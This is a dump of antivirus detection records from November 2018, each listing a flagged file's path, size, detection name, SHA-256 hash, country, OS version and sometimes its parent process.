  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T115154-02944/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:30:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120449-5155b818', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-120428-4CFB2E10\\AVSCAN-20181102-120449-5155B818', filesize=192000, name='TR/Crypt.XPACK.4d0fc7.#M1.#R1'), hash='4d0fc7144beedb0620a8f17931a6969970ed17c42d65de92cf54157233c0cc5a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061248-4aaf644f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061248-4AAF644F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lightmaps.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL12\\lightmaps\\lightmaps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='549a129edf8e1b2dcf657cd8495702ce9fee17d4bbd13188a4f5928b5cc34f30', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053114-7bf92128', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053114-7BF92128', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054210-033be532', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054210-033BE532', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX12.488\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX12.488\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:19:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050754-39e7d67f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050754-39E7D67F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091056-f8299833', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_829dd900\\AVSCAN-20181102-090933-EFFEDB65\\AVSCAN-20181102-091056-F8299833', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:11:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054253-1cc03423', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054253-1CC03423', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lancer.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Prifotherprzaty\\_ALLOWDEL_5a3f\\Lancer.dll', filesize=256000, name='HEUR/AGEN.1018877.#M1.#R1'), hash='5c858bc04261896b1022fea1abd109078daabe60a063234654a0dbd153e3e980', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:58:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.987\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.987\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:53:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nenosa.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp6823540\\nenosa.exe', filesize=384000, name='HEUR/AGEN.1019710.#M1.#R1'), hash='49824b90c407fe18622be622af760de3518c95d8718e03ea11132b3f914b813d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:21:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-234851-61af739b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b19b5d61\\AVSCAN-20181102-234827-5E67213F\\AVSCAN-20181102-234851-61AF739B', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:48:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054514-70ef9a0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054514-70EF9A0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa4032.4225\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa4032.4225\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053930-a3fbfbdf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053930-A3FBFBDF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='batman-a-telltale.exe', filepath='\\\\?\\F:\\البرامج\\جديد\\Batman\\Batman-A-Telltale.exe', filesize=1088000, name='HEUR/AGEN.1008597.#M1.#R1'), hash='56b8c6da8d4a36df9e85c5ef74d6d02028d050ca8e8218376ca91a338354d191', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:26:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060950-26f99344', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06e72e7c\\AVSCAN-20181102-060838-1C0E7647\\AVSCAN-20181102-060950-26F99344', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:09:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00000945', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp00000945', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:44:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192000-11dedfe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb28184d\\AVSCAN-20181102-191828-090A4E9E\\AVSCAN-20181102-192000-11DEDFE0', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:20:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050802-3e719c80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050802-3E719C80', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061431-8826aeae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061431-8826AEAE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051011-8bb724c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051011-8BB724C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050525-e13053cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050525-E13053CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052352-74f09a07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052352-74F09A07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061722-ee57af2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061722-EE57AF2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052732-f7ae278f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052732-F7AE278F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055313-8e416479', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055313-8E416479', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052734-f8d67c7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052734-F8D67C7C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052735-f9711a42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052735-F9711A42', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052926-3ba7a41e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052926-3BA7A41E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060657-7956fe0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060657-7956FE0E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055003-1ceeb169', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055003-1CEEB169', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062028-5d161c13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062028-5D161C13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052712-ebbfd2c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052712-EBBFD2C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061044-00b80472', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061044-00B80472', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052112-156a5fb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052112-156A5FB4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061704-e388ede6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061704-E388EDE6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055623-ffe348c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055623-FFE348C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060349-09434c04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060349-09434C04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053402-e01c0479', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053402-E01C0479', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061737-f6e91341', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061737-F6E91341', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060532-469f3086', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060532-469F3086', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055116-4871efc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055116-4871EFC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052950-49df5678', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052950-49DF5678', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061928-3924cbe9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061928-3924CBE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060915-cc0845a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060915-CC0845A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051454-33f1475e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051454-33F1475E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062120-7baf87d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062120-7BAF87D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060238-df4fef7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060238-DF4FEF7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051422-214e3277', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051422-214E3277', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053732-5d740ed1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053732-5D740ED1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:31Z'), dt=datetime.date(2018, 11, 2)),
